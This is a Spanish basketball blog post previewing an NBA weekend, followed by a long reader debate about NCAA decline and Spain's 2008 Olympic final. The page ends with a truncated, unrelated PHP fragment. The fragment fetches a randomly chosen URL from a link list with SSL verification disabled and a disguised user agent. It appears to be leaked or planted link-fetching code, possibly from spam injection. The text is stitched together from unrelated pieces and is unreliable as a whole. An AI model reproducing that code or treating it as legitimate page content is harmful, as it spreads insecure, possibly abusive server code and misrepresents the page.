Fin de semana: Un menú de 22 partidos

13 de January de 2012 por TheDeerHunter

Tras el éxito inaugural del primer fin de semana popular en TJNBA se nos echa encima el siguiente. Ya sabéis, ahora más que nunca es cuando vosotros sois el blog.

Hay material de sobra para no aburrirse. 11 choques el viernes y 11 el sábado.

Esta próxima madrugada el plato estrella puede ser el Miami@Denver, con la fascinación morbosa de ahondar en el viacrucis que puede ser la gira de los Heat por el Oeste. Fácil no lo van a tener porque los Nuggets se han mostrado especialmente fuertes en su casa y son un grupo potente. Por si faltaba algún atractivo, Rudy lo viene haciendo muy bien. (4:30 AM).

Destacan también las visitas de Chicago a Boston (2 AM) y de Blazers a San Antonio (2:30 AM). En ambos casos los locales andan un poco de capa caída pero siguen siendo una complicada piedra de toque a la hora de evaluar el nivel real de los dos gallos visitantes.

Los campeones Mavs tratarán de mantener su buena racha ante unos Bucks en forma (2:30 AM). Los Sixers problablemente tendrán menos problemas con Washington (1 AM), mientras que los Pacers viajarán a Toronto. Veremos partido si Calderón y los suyos recuperan el nivel que han llegado a mostrar este curso (1 AM).

Juegan también tanto Pau, en el Staples contra Cavaliers (4:30 AM) como Ricky en New Orleans (2 AM). A ver cual es el efecto anímico de la positiva votación por el all-star que vienen recibiendo.

Además, para los muy freaks tendremos un Detroit@Charlotte (1AM), un Sacramento@Houston (2AM) y un New Jersey@Phoenix (3AM).

Y el sábado más madera:

Derbi angelino con los Clippers como local (4:30 AM) con la curiosidad de comprobar si se repetirá el resultado de los 2 partidos de preseason, visita de los Celtics a Indianapolis, de los Knicks a Oklahoma City, de Blazers a Houston… También veremos cómo se adaptan los Hawks a la baja de Horford (lo harán ante Minnesotta)

Finalmente los Sixers devuelven la visita a Washington, los Warriors se van a Charlotte, Toronto a Chicago, NOLA a Memphis, Sacramento a Dallas y New Jersey a Salt Lake City.

A pasarlo bien, chicos, y a comentar mucho por TJNBA.

Comenta

191 comentarios a esta entrada

  1. melo15 dice:
    #1

    Mirar partido, no puedo deberes mañana tengo examen de Biologia un coñazo, y tengo un examen de dibujo tecnico un coñazo tambien

      Citar

  2. Pirata dice:
    #2

    Pues a estudiar, y yo a currar…..de momento -NY 6 arriba media parte, Mem +25 3er cuarto.

      Citar

  3. melo15 dice:
    #3

    eso primero la obligacion y luego la devocion XD

      Citar

  4. HeiNeKeN dice:
    #4

    Ya te lo resumo yo, Orlando enchufando triples como si no hubiese mañana y Carmelo con un 1-9 en triples, fallando 4 tiros en los ultimos 3 minutos y con una perdida de balon que ha sido contrataque claro de Orlando.

    +7 Magics a falta de 1 minuto

      Citar

  5. HeiNeKeN dice:
    #5

    y ganaron los Magics, 5 de 19 Carmelo en la 2º parte.
    Ryan Anderson 7 de 12 en triples

      Citar

  6. Pirata dice:
    #6

    No es malo no el Irving ese.

      Citar

  7. melo15 dice:
    #7

    Bueno esque claro, es verdad que ha sido un poco egoista, pero esque si no anota el quien lo va hacer

      Citar

  8. TheDeerHunter dice:
    #8

    kantonyo:
    De todas formas creo que muchos no captáis bien lo que es la NCAA, es imposible compararla con cualquier otra liga, tener en cuenta que los equipos cambian año a año, los jugadores duran sólo 1-2-3 o 4 años como mucho. Imaginaros una liga de fútbol o baloncesto, donde los mejores se van a cumplir 23 años y los “más mejores” se van al cumplir 19.

    Os imagináis una liga de división de honor de futbol en españa con jugadores juveniles, donde se llenaran estadios, la gente comprara sus camisetas, la final de ese torneo se celebrara en un estadio de 100.000 personas, y que ese partido fuera más visto en TV para todo el pais que un Madrid-Barça???

    Si por algún motivo siempre que hay algún partido NBA o en cualquier web de estadisticas, el nombre de un jugador aparece junto a su Universidad donde jugó, es por la importancia de la NCAA en el deporte americano.

    Todo eso me parece fantástico.
    Pero no sólo no es imposible de compararla con otras competiciones sino que es inevitable. Siempre ha sido así.
    La diferencia es que antes no se podía discutir que era la 2ª mejor liga del mundo y ahora no creo que muchos puedan defender tal cosa.

      Citar

  9. TheDeerHunter dice:
    #9

    Denise: Pues sin animo de trollear y meter de por medio el futbol, para mi es así. Creo que una selección mundial de jugadores sub-20 de futbol serían mejores que la mayoría de equipos de Segunda.
    De hecho, el Barcelona B está formado por crios de 20 años de media de edad y se zumba a muchos equipos de Segunda llenos de veteranos y de gente con bastante experiencia en Primera

    El tema de los filiales es claramente visible, con quien compiten y como suelen quedar habitualmente. Así que no tengo mucho que decir… sólo que tu apreciación no me parece que tenga demasiado que ver con la realidad.
    Y ojo que no trato de quitar ningún mérito a los equipos de promesas, porque los ha habido buenísimos.

      Citar

  10. TheDeerHunter dice:
    #10

    kantonyo:
    TheDeerHunter, afirmar que cualquier jugador se saltaría la NCAA si pudiera, es omitir la gran capacidad de recruits que tiene la NCAA. Me gustaría que si pudieras en Draftexpress vieras los rankings de los High School por años, y te darías cuenta de que LeBron James hay muy pocos… La NCAA también es una criba para esos jugadores que en el Instituto pintan a estrellas y luego se quedan en nada. Además de encontrar jugadores del estilo de Nash que nunca hubieran sido encontrados por nadie desde el High School.

    Vuelve a pasar que pones en mi boca cosas que no he dicho. El matiz es importante. No he dicho que cualquier jugador se saltaría la NCAA, pero sí algunos y de esos los casos más significativos.
    Concretamente sería el mismo porcentaje que se lo saltaba antes de imponer esa (para mí injusta) regla de la edad y con la tendencia creciente que se veía percibiendo.
    La culpa fundamentalmente la tiene el punto injusto del reparto de ganancias… que es un verdadero pasote. Pero claro, no conviene matar a la gallina.

    No se ve que Kobe, LeBron o Bynum echen demasiado de menos ese periplo.

    En realidad, lo que me fastidia de este debate es que da la impresión que no valoro el papel de la NCAA… pero es que nunca me ha gustado eso de que para valorar algo hay que tratar de infravalorar por todos los medios a sus “competidores”. Me parece asombroso que ahora mismo alguien crea que la NCAA es una competición superior a la Euroliga.

      Citar

  11. kantonyo dice:
    #11

    el debate no ha surgido por infravalora a la Euroliga que yo no pretendo hacerlo, el debate ha surgido por infravalorar la NCAA, y si no hecha un vistazo a los comentarios.

    Se ha dicho que la liga está muy mal, (no será por temas de audiencias, seguimiento en estadios y publicidad, a pesar de la crisis), se ha dicho que los rookies de los últimos años han sido malos (ya he dado datos de que no es así) y luego se ha dicho que es peor que la Euroliga y otros han dicho que es mejor, yo en mi opinión creo que no se pueden comparar, debido a las circunstancias especiales de la NCAA, ni ahora ni antes.

      Citar

  12. TheDeerHunter dice:
    #12

    kantonyo:
    el debate no ha surgido por infravalora a la Euroliga que yo no pretendo hacerlo, el debate ha surgido por infravalorar la NCAA, y si no hecha un vistazo a los comentarios.

    Se ha dicho que la liga está muy mal, (no será por temas de audiencias, seguimiento en estadios y publicidad, a pesar de la crisis), se ha dicho que los rookies de los últimos años han sido malos (ya he dado datos de que no es así) y luego se ha dicho que es peor que la Euroliga y otros han dicho que es mejor, yo en mi opinión creo que no se pueden comparar, debido a las circunstancias especiales de la NCAA, ni ahora ni antes.

    Hacerme repasar 161 comentarios para confirmar lo que ya sabía… >:/
    El debate empieza con una broma de Nacho a Melo en el que dice que él y los jugadores que suele nombrar son bastante hacenúmeros (cuando él se lo aplicaba a Ricky) “como todo lo que sale de la NCAA” (que yo extendería a lo americano en general, que bebe bastante de esa filosofía) Aunque no dejaba de ser una broma según luego te comentaba él mismo.
    Después Melo, en su línea, decía que la NCAA es mejor que la Euroliga y la ACB. Y ahí entrabais con lo de la cantera y demás…

    En fin. Que no voy a insistir en quién dijo qué. Por mi parte la NCAA es una fantástica liga universitaria/de desarrollo y un pasote de cantera… pero en mi opinión sí puede hacerse y se ha hecho toda la vida comparaciones y ahora mismo no la resiste, por unos motivos u otros.
    Yo creo que es un hecho demostrado que antes hacías una selección con esos jugadores y barrías en una competición internacional. Ahora no sucede eso y se percibe claramente una disminución (absoluta o relativa) de prestigio.
    Desconozco los motivos… pero no estoy muy seguro si en su día alguien se permitiría el lujo de dejar al equivalente de Derrick Williams lamiendo bancos día sí y día también en un equipo “paria” como Minnesotta. Me imagino la que se hubiera liado si alguien hubiera hecho eso con Larry Bird, por poner un ejemplo y él estaba en los Celtics. Creo que todo eso cuenta en esta percepción de “declive”… aunque admito que no soy ningún experto en el tema.

      Citar

  13. melo15 dice:
    #13

    Lo que estais diciendo es una tonteria, la NCAA es mas espectacular, por lo menos que la ACB, la Euroliga, no lo se, pero la ACB es aburridisima. Y yo si que veo la ACB, por lo tanto puedo decir que es un palo

      Citar

  14. Nacho dice:
    #14

    NCAA vs. EUROLIGA (ACB)
    Parece el título de un reportaje de Informe Robinson. ¿Os imagináis al Daimiel de gira por los EEUU entrevistando a la peña sobre lo que ha sido y será la NCAA?
    Como apunta Deer todo comienza con una coña mía para responder a Melo. (Si supiera poner emoticonos se notarían antes las coñas, pero no se).
    Pero como todas las coñas algo tiene de cierto. La cuestión es como nos la tomemos.
    Sobre lo aburrido de cada competición supongo que entran los gustos. Yo la NCAA la he visto en las fiales, y pocos partidos me han dejado sentado. La Euroliga en su tramo final, aun siendo coñazo algunas veces, tiene infinita más clase baloncestística que la NCAA.
    Obvio que los que juegan esta última competición son más jóvenes, tienen más proyección, y algunos serán megacracks, Pero hay algo indudable, y lo ha dicho por activa y por pasiva Deer en este debate: La NCAA no es lo que era, está en declive. Razones hay muchas, pero lo obvio, es obvio. Antes ponías cualquier selección de USA llena de universitarios, y se comían al resto de las selecciones mundiales. Alguna vez había equilibrio, pero era alguna vez. De hecho, ahora EEUU, para acudir a los juegos olímpicos pone dreamteam por todos lados, y si bien los números nos dicen que arrasan, cada es menos.
    ¿Que todo esto sucede porque en el resto del mundo ha subido exponencialmente la calidaad de los jugadores? podría ser. Aunque también se aprecia cierto declive en los usanos.
    Pues eso, paz y amor para los parias, a nosotros dejarnos con basket del bueno (aunque para algunos éste sea el de la NCAA.

      Citar

  15. melo15 dice:
    #15

    Declive??? Pero tu has visto los Drafts de estos ultimos años??? Han sido, bastante buenos.
    En los Juegos Olimpicos, Estados Unidos, va con los de la NBA porque quieren ganar no?

      Citar

  16. Sancho88 dice:
    #16

    melo, intenta tomarte el foro más relajadamente, parece que cada comenario es una afrenta contra ti y tienes que saltar a todo lo que se diga. Como bien ha dicho Nacho, estaba de coña. Yo también suelo estarlo, por si no te has dado cuenta. El basket es para disfrutarlo, y a veces hay que saberse tomar con sentido del humor las cosas

      Citar

  17. TheDeerHunter dice:
    #17

    melo15:
    Declive??? Pero tu has visto los Drafts de estos ultimos años??? Han sido, bastante buenos.
    En los Juegos Olimpicos, Estados Unidos, va con los de la NBA porque quieren ganar no?

    Da la casualidad que algunos hemos visto unos cuantos drafts más que los últimos 14.

      Citar

  18. kantonyo dice:
    #18

    Vamos a pecar de pesaos con este debate, pero bueno para esto está el blog…. jajajaja

    NIEGO LA MAYOR!!!

    Cuando los americanos han ganado cómodamente a los europeos con equipo NCAA???

    Mundial 70 – 5º Puesto – Plantilla NCAA
    JJOO 72 – 2º Puesto – Plantilla NCAA
    Mundial 74 – 3º Puesto – Plantilla NCAA
    JJOO 76 – 1º Puesto – Plantilla NCAA – Ganando por los pelos a Puerto Rico y URSS
    Mundial 78 – 5º Puesto – Plantilla NCAA + Atletas de Cristo
    JJOO 80 – No jugaron
    Mundial 82 – 2º Puesto – Plantilla NCAA
    JJOO 84 – 1º Puesto – Plantilla NCAA…. No jugó URSS y participaron parte de la mejor generación de baloncesto de la historia de los USA.
    Mundial 86 – 1º Puesto – Plantilla NCAA – Ganaron por los pelos a URSS y Puerto Rico, perdieron con Argentina
    JJOO 88 – 3º Puesto – Plantilla NCAA –
    Mundial 90 – 3º Puesto – Plantilla NCAA –

    Vaya, no creo que la NCAA barriera como dices hace 20-30 años… Le costaba horrores ganar a URSS, Yugoslavia, Puerto Rico y muchas veces no lo hacía … aunque es indudable que había menos competitividad en FIBA durante esos años.

      Citar

  19. kantonyo dice:
    #19

    Vamos a imaginar quintetos de las últimas competiciones internacionales con equipo NCAA:

    2004 – JJOO Atenas : Okafor, Deng, Iguodala, Gordon, Kv. Martin, Nelson y Harris

    2006 – Mundial Japón : P. Millsap, L. Aldridge, Rudy Gay, B. Roy, R. Rondo

    2008 – JJOO Pekin : B. Lopez, B. Griffin, R. Hibbert, K. Love, Oj Mayo, Westbrook, E. Gordon, D. Rose

    2010 – Mundial Turquia : G. Monroe, D. Favors, D. Cousins, P. George, E. Turner, J. Wall,

    Vistos a posteriori no eran malas plantillas y podrían competir con cualquier equipo internacional, eso sí, estos jugadores la mayoría a su edad no estaban en sus mejores condiciones. Además muchos de ellos no hubieran ido, ya que dieron el salto de calidad después… seguro que hubieran ido alguno del estilo Adam Morrison, JJ Redick, Shelden Williams, Wesley Johnson, Beasley o Randy Foye

      Citar

  20. melo15 dice:
    #20

    Ya Deer, pero desde Wikipedia me he repasado todos los draft desde el de Magic hasta los de ahora, y me he leido la Bieografia dew muchos de ellos, puntuandolos, segun cuantos HOF habia, y si veia alguna posicion rara, entraba y me leia la Biografia de este, no los he visto, pero los he leido a fondo

      Citar

  21. Nacho dice:
    #21

    kantonyo: Vamos a pecar de pesaos con este debate, pero bueno para esto está el blog…. jajajajaNIEGO LA MAYOR!!!Cuando los americanos han ganado cómodamente a los europeos con equipo NCAA???Mundial 70 – 5º Puesto – Plantilla NCAAJJOO 72 – 2º Puesto – Plantilla NCAAMundial 74 – 3º Puesto – Plantilla NCAAJJOO 76 – 1º Puesto – Plantilla NCAA – Ganando por los pelos a Puerto Rico y URSSMundial 78 – 5º Puesto – Plantilla NCAA + Atletas de CristoJJOO 80 – No jugaronMundial 82 – 2º Puesto – Plantilla NCAAJJOO 84 – 1º Puesto – Plantilla NCAA…. No jugó URSS y participaron parte de la mejor generación de baloncesto de la historia de los USA.Mundial 86 – 1º Puesto – Plantilla NCAA – Ganaron por los pelos a URSS y Puerto Rico, perdieron con ArgentinaJJOO 88 – 3º Puesto – Plantilla NCAA –Mundial 90 – 3º Puesto – Plantilla NCAA -Vaya, no creo que la NCAA barriera como dices hace 20-30 años… Le costaba horrores ganar a URSS, Yugoslavia, Puerto Rico y muchas veces no lo hacía … aunque es indudable que había menos competitividad en FIBA durante esos años.

    Vale, admitamos que la he cagado en mi comentario. Voy a intentar defenderme.
    1. No es lo mismo JJOO que Mundiales, sobre todo para los americanos. Los JJOO son LA COMPETICIÓN, y los Mundiales casi torneos de verano. Otra cosa es como nos lo tomemos aquí.
    2. Tras lo que acabo de decir, que espero que compartáis, porque si no, abrimos otro debate para amodorrarse. veamos resultados de JJOO:
    México 68. USA 1º
    Munich 72. USA 2º puesto. La final de la polémica.
    Montreál 76. USA 1º
    Moscú 80. Boicot
    Los Ángeles 84. 1º. Por cierto, final contra España. España con el mejor equipo de siempre (sin contar a los de ahora, obviamente) que jugó la final “para divertirse y a ver cuántos nos meten” más o menos dijo Itu. laro, la mejor generación de la NCAA (Más a mi favor, por cierto.
    Seúl 88. USA 3º………..PRIMERA GRAN CAGADA Y… NO NOS VUELVE A PASAR, EN EL 92 HAREMOS EL…
    Barcelona 92. USA 1º DREAM TEAM.

      Citar

  22. melo15 dice:
    #22

    Con todo esto que quieres decir Nacho?

      Citar

  23. kantonyo dice:
    #23

    No nos vuelve a pasar??? Vaya pues si les volvió a pasar…. Atenas 2004!!

    La generación de los Magic, Bird, Jordan, Wilkins, Olajuwon, Barkley, Malone … no es un punto para tí… es un punto para toda la humanidad !!!! jajajaja.

    Si comparas la NCAA actual con esa generación, entonces te doy la razón, ahora está muchísimo peor… pero hombre yo lo comparo de una forma regular con los últimos 30-40 años.

    El peor momento sin duda para mí de la NCAA en la época moderna, fue a principios del 2000.

    El año 2000 hubo un pésimo draft, en el 2001 empezaron a saltarse la NCAA los jugadores con más posibilidades en el draft (tb lo hicieron pufos como K.Brown y E.Curry), llegaron una gran camada de jugadores europeos como Gasol, Parker, Nowitzki en esos años, incluso un chino nº1 draft. Stoudemire se salto la NCAA, despues en 2003 lo hizo LeBron James, un año después Dwight Howard y Al Jefferson, en 2005 Bynum y partir de 2007, 2008, 2009 para mi ha vuelto a dar buenos jugadores por lo que creo que en este momento goza de buena salud .

      Citar

  24. Nacho dice:
    #24

    kantonyo: No nos vuelve a pasar??? Vaya pues si les volvió a pasar…. Atenas 2004!! La generación de los Magic, Bird, Jordan, Wilkins, Olajuwon, Barkley, Malone … no es un punto para tí… es un punto para toda la humanidad !!!! jajajaja. Si comparas la NCAA actual con esa generación, entonces te doy la razón, ahora está muchísimo peor… pero hombre yo lo comparo de una forma regular con los últimos 30-40 años.El peor momento sin duda para mí de la NCAA en la época moderna, fue a principios del 2000.El año 2000 hubo un pésimo draft, en el 2001 empezaron a saltarse la NCAA los jugadores con más posibilidades en el draft (tb lo hicieron pufos como K.Brown y E.Curry), llegaron una gran camada de jugadores europeos como Gasol, Parker, Nowitzki en esos años, incluso un chino nº1 draft. Stoudemire se salto la NCAA, despues en 2003 lo hizo LeBron James, un año después Dwight Howard y Al Jefferson, en 2005 Bynum y partir de 2007, 2008, 2009 para mi ha vuelto a dar buenos jugadores por lo que creo que en este momento goza de buena salud .

    Pero ya la cagaron con profesionales allí. Lo que me refiero es que antes ni se planteaban llevar profesionales a los JJOO, y ahora sí, ahora es obligado. Después del Dream Team empezaron a llevar segundos espadas y ya vemos que pasó. Ahora es impensable que acudan a unos juegos sin los mejores.
    Puntualmente, estos últimos años, podrá haber grandes camadas en la NCAA. (Me fío de tí, yo no lo controlo tanto) Pero bien es cierto que no configuran únicamente la casta noble de la liga. Como bien dices, a la mala camada de principios de sigo se unió el gran desembarco de tipos como el alemám, el chino o el de Sant Boi. Pero es que ahora también siguen llegando. Los chicos de los dos últimos draft no se han asentado totalmente (ya había europeos) y la sensación de este año son Irving y Ricky, (uno y uno). Con lo que, aunque como tú apuntas (y yo me creo) las camadas de ahora son buenas, no llegarán a marcar las grandes diferencias de hace 20 años (aunque eliminemos a los del 84 porque eso sí que fue una conjunción planetaria)
    Luego están los gustos, las circunstancias, la enorme mejora del basket mundial (y europeo en particular), en la que claro, ellos (gente de este deporte y sobre todo entrenadores universitarios que ‘enseñaron’ a los de aquí) han tenido mucho que ver.
    Hace 20 años se podría hacer NCAA vs. resto del mundo, ahora es impensable.
    Eso creo que demuestra muchas cosas.
    También es cierto que hasta los profesionales (los buenos de verdad) las pasan jodías para ganar a España
    en la finalísima, con lo que podría admitirla mayor de que por aquí hemos mejorado mucho, con lo que de alguna manera hemos igualado las cosas.
    Es decir, el nivel, gracias a los de fuera, es más parejo, con lo que de todas formas se infiere que la NCAA ha perdido peso.

      Citar

  25. melo15 dice:
    #25

    Tampoco juegan esnserio contra España, porque si no Rose se funde a clade, wade se merienda a Rudy, Lebron Melo y Durant se funden al que sea el alero, Pau aguanta, Marc aguanataria un poco pero al final entre Howard y Love y Griffin lo fundirian

      Citar

  26. Sancho88 dice:
    #26

    melo15:
    Tampoco juegan esnserio contra España, porque si no Rose se funde a clade, wade se merienda a Rudy, Lebron Melo y Durant se funden al que sea el alero, Pau aguanta, Marc aguanataria un poco pero al final entre Howard y Love y Griffin lo fundirian

    Melo, tu no viste la final de pekin 2008? Jimenez se fundió a Lebron, Pau a Howard… tio, eres un poco bocazas

      Citar

  27. The wolf dice:
    #27

    melo15:
    Tampoco juegan esnserio contra España, porque si no Rose se funde a clade, wade se merienda a Rudy, Lebron Melo y Durant se funden al que sea el alero, Pau aguanta, Marc aguanataria un poco pero al final entre Howard y Love y Griffin lo fundirian

    Tu el partido de Pekin en 2008 no lo viste no?

    Te recomiendo que lo hagas…reconociendo la gran superioridad del combinado norteamericano estoy orgulloso poder decir que le plantamos cara como nadie habia hecho…y me atrevo a decir que si no fuera por un personajillo lituano con silbato que no veia los incontables pasos de salida de los yankees igual se estuviera hablando hoy de que Usa tiene que llevar lo mejorcito a londres para que no vuelva a ocurrir lo de 2008…y paro ya que saco mi “yo” patrio y no paro xD

      Citar

  28. Sancho88 dice:
    #28

    Señores Jurgenbrand, Brazauskas y Estevez, tres auténticos vendidos. Creo que a los pocos días salió Luigi Lamónica confesando todo el chanchullo. Y por primera vez Melo, si no viste ese partido, cierra la jodida boca macho. Es que tus comentarios bajan mucho el nivel, siento decírtelo. Ni te moderas, ni nada, sueltas lo primero que te viene a la cabeza, chorradas como puños. En serio, aquí no comentamos ni un tercio de las personas que entran. Trata de no joderla…

      Citar

  29. melo15 dice:
    #29

    Primero, si lo vi el partido
    Segundo por mucho que te moleste, si los americanos jugaran a nivel playoff, se fundirian a la mitad de la seleccion española, eso esta clarisimo, Pau aguanta puede superar pero los demas no, es un hecho que ellos son mejores que vostros, clarisimo.

      Citar

  30. Sancho88 dice:
    #30

    http://www.youtube.com/watch?v=1VyCHLpZdgU

    Pues a ver si este vídeo te refresca la memoria. Si entra el triple de Jiménez, nos hubiéramos puesto a 1. Y los americanos los tenían de corbata. Krizewsky pidio tiempo muerto porque estaban todos acojonados. Si ves sus caras flipas. Y aún así tienes la desfachatez de decir que nos pulieron??? En fin, menos mal que siempre nos quedará memoria, vídeos y criterio

      Citar

  31. Sancho88 dice:
    #31

    Yo solo sé que aquel día Estados Unidos tembló, porque por primera vez, con todo su equipo lleno de all stars y todo lo que tú quieras, un equipo Fiba casi se los lleva por delante. Eran juegos olímpicos, y para Estados Unidos una de las medallas de oro más importantes que deben luchar, además de la de cien metro lisos, relevos 4×400 en ateltismo y el 4×100 en natación, es la de baloncesto. Y yo solo sé que aquel partido dieron todo lo que tenían, hicieron pasos, dieron más hostias que en toda su carrera nba, y que vale, yo digo que al final fue justa su victoria porque son mejores, pero de ahí a decir que nos pulieron, que nos pasaron por encima… Repito, no sé que partido viste tú…

      Citar

  32. melo15 dice:
    #32

    Nose tenia 10 años, donde he dicho yo que os pulieron

      Citar

  33. Blade Petrovic dice:
    #33

    .Melo yo tambien y cuando tenia 8 tu gran melo y unos cuantos mas se pegaron una pifia en japon los elimino grecia a la q españa pano

      Citar

  34. Sancho88 dice:
    #34

    melo, tu has dicho que los americanos nos pulen. Y ya te digo yo que no, que sean superiores y favoritos, y lo más normal es que nos ganen, ok. Pero de ahí a pulirnos… va un mundo

      Citar

  35. rumbero dice:
    #35

    Hombre melo, 4 comentarios arriba dices que USA en modo play offs se fundiría a la mitad de la selección española. Si recordaras esa final no dirias eso. Está muy bien soltar opiniones pero si tienen algun tipo de rigor pues siempre es mucho mejor. Cuando Rudy metió el triple que nos ponía a 2 después de ir unos 15 abajo estaban realmente acojonados. Nada de filigranas y regaladas. Se tuvieron que poner el mono de trabajo y como son muy buenos y los árbitros les echaron una mano ganaron. Mítica la vacilada de Navarro haciendo como 5 pasos de salida al final del partido…

      Citar

  36. Blade Petrovic dice:
    #36

    Y el mate de rudy in the face of superman

      Citar

  37. Jose Luis dice:
    #37

    para quién quiera revivirlo 🙂

    http://www.rtve.es/alacarta/videos/programa/final-jjoo-pekin-espana-107-118-eeuu/266605/

    acabo de ver lo de los pasos, tenía que haberlo hecho más exagerado aún jajajajaja

      Citar

  38. melo15 dice:
    #38

    Pues eso que se fundiria, Condicional, no que se fundio, y esque es verdad, nadie sabe que pensaron los jugadores de USA en aquella final, solo sabemos que cuando iban 2 arriba se cagaron, puede ser que fuera asi, no lo niego, pero y antes de ir 2 abajo, nolose, puede que me haiga precipitao un poco al decir lo que he dicho, pero esque yo lo creo asi, no me entra que Lebron, pueda ser fundido por Jimenez, cuando no lo para nadie ni en la NBA, no me entra que Wade, Kobe y todos se cagaran ante Garbajosa, y Navarro, no.
    La unica razon que encuentro esque no jugaron en serio.
    Blade, Japon que competicion era???

      Citar

  39. Jose Luis dice:
    #39

    se dice HAYA precipitado melo 🙂 y Japón era un mundial, puedes decir que no fueron con todo el equipo al máximo, es cierto. Pero en la final de los JJOO, estaban haciendo todo lo posible por ganar, con el mejor equipo posible, y pese a los múltiples pasos que hicieron, ganaron a España por muy poco. Eso es un hecho 🙂

      Citar

  40. Blade Petrovic dice:
    #40

    Era un mundial y con tu gran melo no me acuerdo de mas gente pero perdieron contra grecia la cual fye panada por España en la final

      Citar

  41. melo15 dice:
    #41

    El mundial no se lo toman enserio, esto ya lo hemos dicho no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>